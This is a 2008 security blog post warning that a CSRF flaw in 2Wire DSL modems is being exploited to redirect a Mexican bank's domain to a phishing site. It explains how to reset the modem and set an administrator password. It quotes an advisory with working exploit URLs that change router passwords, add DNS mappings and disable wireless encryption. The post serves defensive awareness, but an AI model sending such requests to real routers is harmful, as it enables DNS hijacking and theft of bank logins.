Wizcrafts Computer Services - Computer Troubleshooting, Consulting, Internet and Website Security and Webmaster Services
  • Site Home
  • Blog Home
  • Info
    • About Wizcrafts
    • Service rates
    • Service call zones
    • Online payments page
    • My Policies
    • My anti-spam policy
    • Webmaster Services
    • Links and Resources
    • Sitemap
    • Related Websites ▾
      • Wiztunes Steel Guitar
      • R&W Leatherworks
  • Technical
    • Computer FAQs
    • Networking basics
    • Computer RAM
    • Find your IP address
    • Test your modem
    • Web hosting basics
    • Wiz's Workshop
  • Security
    • About My Blocklists
    • .htaccess Blocklists ▾
      • .htaccess overview
      • Chinese
      • LACNIC
      • Nigerian
      • Russian
    • Mailwasher Pro ▾
      • MailWasher Pro overview
      • Wiz's spam filters
      • MWP Blacklist
      • MailWasher Change Log
    • Website security ▾
      • FormMail security
  • Contact
    • General Contact Form
    • Webmaster Reports
  • Font
    Size
    • Smaller
    • Larger
Nav
  • Blog
    Links
  • Font
    Size
    • Smaller
    • Larger
  • ∧
Powered by Hostgator
Search

Wiz's Computer and Website Security Blog

Wiz Feinberg

Our blog deals with computer troubleshooting, vulnerability alerts, computer security, spyware & virus removal tools, e-mail threats, spam filters and website security issues.

My blog is supported by commissions from advertisements for worthy programs and services, some of which I personally use and recommend, including the following:

MailWasher Pro is an effective spam and web threat filter that detects and deletes spam before it is downloaded into your desktop email client. It checks multiple POP and IMAP email accounts simultaneously. I have been using this anti-spam program continuously since its inception and even write and publish MailWasher spam filters for others to use. Try it free for 30 days. One license covers 3 computers. Choose from one, two, three year and lifetime subscriptions, with reasonable sliding rates. See the discounted prices in the shopping cart now.

Spacer rule

« End of support for Ad-Aware SE. Upgrade to 2007 | Blog Home | My Spam analysis for the 2nd week of January, 2008 »

Hackers exploit vulnerability in 2Wire modems to steal Mexican bank accounts

In a recent security alert, found on several high profile security websites, it has been revealed that hackers, in parts unknown, are exploiting vulnerabilities in certain models of the 2Wire brand of DSL modems, to steal bank accounts - in Mexico. These modems are also in use in the US, so don't get smug about this happening in Mexico only. That is probably a test run by the hackers, before hitting the US based modems.

The modus operandi of this attack begins with a spammed email that is rigged with hidden codes that are embedded in an image tag, plus a link to view a hostile video, where another piece of malware will try to install itself (TROJ_QHOST.FX). People who don't have the targeted modem won't be affected directly by these codes - this time. On the other hand, people who do have these modems and have not created a personal password for the modem's administrator login, will have these hidden codes passed directly to it. The codes will poison the DNS entry for banamex.com, which is the largest bank in Mexico. This DNS poisoning will automatically redirect all requests for banamex.com to a look-alike phishing website, where, when people login to their account, that login information will be added to the database owned by the criminals behind this exploit. These people will have their accounts emptied, unless they realize that they've been duped before the hackers get to their money (not likely).

Because this attack involves poisoning the DNS entries for the bank's website, in the modem itself, even typing banamex.com — which is the legitimate, fully-qualified domain name for this bank — leads to the fraudulent site instead. This is the same type of exploit that occurs when spyware poisons a computer's HOSTS file, to redirect specific requests to a hostile address. This exploit occurs invisibly for users of the affected modems who have not changed the default administrator password, which is null (none set). If they have created a personal password this exploit will fail. About 2 million of the affected modems have been shipped to customers in Mexico, all without an administrator password set. It is up to the recipients to create an administrator password.

This is a known, unpatched exploit, that was first reported on August 17, 2007. It is known as an "xslt Cross-site request forgery" (CSRF) vulnerability, which affects 2wire modem/router models 1701HG, 1800HW, and 2071, with 3.17.5, 3.7.1, and 5.29.51 software. It allows remote attackers to create DNS mappings as administrators, and conduct DNS poisoning attacks, via the NAME and ADDR parameters. That demonstrates the importance of changing the default modem password to one that is not easily guessed. If you have one of these modems and have not already created a strong administrator password, do so as soon as possible!

Background
-------------
This is the most popular router in Mexico and the default installation from the ISP has no system password.

Vulnerability
----------------
It is possible to send a request to the router that will modify its configuration.

It does not validate POST, or Referer or Anything, unless the administrator password has been set by the customer

Exploit
----------------
The client PC sends a request to the router with the configuration changes and they are set instantly.

[examples]

Set a password (NewPassword):
http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NewPassword&PASSWORD_CONF=NewPassword

Add names to the DNS ( 172.16.32.64 www.example.com):
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAM
E=www.example.com&ADDR=172.16.32.64

Disable Wireless Authentication
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&N
AME=encrypt_enabled&VALUE=0

Set Dynamic DNS
http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&I
P_DYNAMIC=TRUE

Also, disable the Firewall, reset the device, etc.

Solution
----------------
To undo the redirect to this phishing website you must reset your 2wire modem to its factory default state. Warning: This will wipe out all saved rules and your login credentials! Have your DSL user name and password ready to input into the modem, after you reset it, or you will not be able to get back onto the Internet.

If your modem has a small hole, with a reset button on the back, or bottom, insert a paper clip or ballpoint pen into the hole, push it against the recessed button and hold it in for about 2 minutes, with the power on. After two minutes let go of the button, wait about ten seconds, then, unplug the power to the modem for another two minutes. Plug it back in and let it stabilize. You will have to input your login credentials to get logged onto the DSL service. To do so, open your browser and go to this address: http://gateway.2wire.net/ . You can also access the modem/router, if has no other routers between it and your computer, by typing in: http://192.168.1.254, where you can input your login credentials.

If your modem does not have a reset button you can reset it electronically, by using this method. Open your web browser and type this address into the address/location bar: http://gateway.2wire.net/management or http://192.168.1.254/mdc . On that page you can perform administrator password creation and reset the modem to it's default state (under Troubleshooting, click on: RESET TO FACTORY SETTINGS).

After you reset the modem to factory settings and input your login credentials, log back onto the management page and click on "Run Setup Wizard, " where you can create a strong administrator password and disable unnecessary features, like remote administration, to prevent this type of exploit from repeating itself.

Sources:
----------------
http://www.securityfocus.com/archive/1/archive/1/476595/100/0/threaded

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4387

http://xforce.iss.net/xforce/xfdb/36044

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4389

http://blog.trendmicro.com/targeted-attack-in-mexico-dns-poisoning-via-modems/

Posted by Wiz on January 13, 2008 1:51 PM | Permalink

If you like this article please share it.

Facebook Twitter LinkedIn Pinterest WordPress Addthis

 

Subscribe to this blog's feed
Creative Commons License This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.

Tag Cloud

  • Adware
  • anti spam
  • bots
  • definitions
  • Diplomas
  • E-mail filtering
  • E-mail spam
  • Email
  • email
  • Email client
  • fake anti spyware
  • fake av
  • filters
  • Joe Job
  • junk filters
  • mail
  • mail washer
  • mailwasher
  • MailWasher Pro
  • Malicious Software
  • Malware
  • malware
  • Malwarebytes' Anti-Malware
  • Microsoft Windows
  • Personal computer
  • pump and dump scam
  • rogue anti virus
  • rootkits
  • scam
  • Search & Destroy
  • Search and Destroy
  • Security
  • Shareware
  • Soviet Union
  • spam
  • Spam
  • spam filters
  • SpamCop
  • Spybot
  • Spybot - Search & Destroy
  • Spybot Search
  • spyware
  • Spyware
  • Spyware and Adware
  • Trend Micro Internet Security
  • Trojans
  • Type I and type II errors
  • washer
  • Windows PCs
  • Zombie computer

(back to top)

Blog Links

Sponsored Message

I recommend Malwarebytes to protect your computers and Android devices from malicious code attacks. Malwarebytes detects and blocks spyware, viruses and ransomware, as well as rootkits. It removes malware from an already infected device. Get an 18 month subscription to Malwarebytes here.

If you're a fan of Robert Jordan's novels, you can buy boxed sets of The Wheel Of Time, here.

As an Amazon and Google Associate, I earn commissions from qualifying purchases.

CIDR to IPv4 Address Range Utility Tool | IPAddressGuide
CIDR to IPv4 Conversion




About the author
Wiz FeinbergWiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security and combating spam. Wizcrafts Computer Services was established in 1996.

I produce this blog and website at my own expense. If you find this information valuable please consider making a donation via PayPal.

Follow @Wizcrafts on Twitter, where I post short updates on security issues, spam trends and things that just eat at my craw.

Follow Wizcrafts on Twitter

Recent Posts

  • Return of the Facebook Ad Violation Scam
  • Fix for Logitech Setpoint won't open on Windows 10 in 2023
  • Facebook Ads Scam
  • Nigerian romance scammers are targeting Facebook
  • TD Canada Trust 419 scam arrives in postal letters
  • Tis the season of Facebook and Messenger account impersonators
  • Securing your Facebook account
  • Webhosting Deal Alert!
  • Domain Registry renewal pitch is back again
  • Return of the Domain Registry renewal notice sales pitch

Popular Posts

  • Running a PC with reduced user privileges stops 92% of malware
  • Fix Dell Latitude Wandering Pointer
  • Limited User Privileges Protect You
  • MailWasher Pro Filters Out Spam
  • Displaying spam headers

Categories

  • Application Patches/Updates
  • Botnet News
  • Browser Updates
  • Domain Website Issues
  • Email
  • General Topics
  • Malware Threats In The Wild
  • Product Lifecycle Notices
  • Scams
  • Security News
  • Security Program Updates
  • Security Tips
  • Security Tool Releases
  • Spam Issues
  • Technical Articles
  • Vulnerability Alerts
  • Welcome Message
  • Windows Update Notices

Archives

Spyware Removal Forums
  • Bleeping Computer Forums
  • MailWasher Pro Forums
  • MajorGeeks Forums
  • Malwarebytes Anti-Malware Forum
  • Spybot S&D Malware Removal Forum
  • Spywareinfo Forums

(back to top)

Copyrights and advertising affiliation statements

Wizcrafts Computer Services website and our blog is written and maintained by Wiz Feinberg, who is solely responsible for its content.

Our website is hosted by Hostgator.

All articles, text, and non-advertising images on this website are the property of Wizcrafts Computer Services, ©2000 - 2023.

These web pages contain affiliate advertising links to third party companies, products, services and ad networks. I may receive commissions for sales or referrals to these third party websites to help cover my costs. Further, I use many of the services and programs I promote at my own expense.

Please send any business or reprint inquiries, or display problems, or inaccuracy reports to the Webmaster.

Powered by Movable Type. Theme by Wiz Feinberg.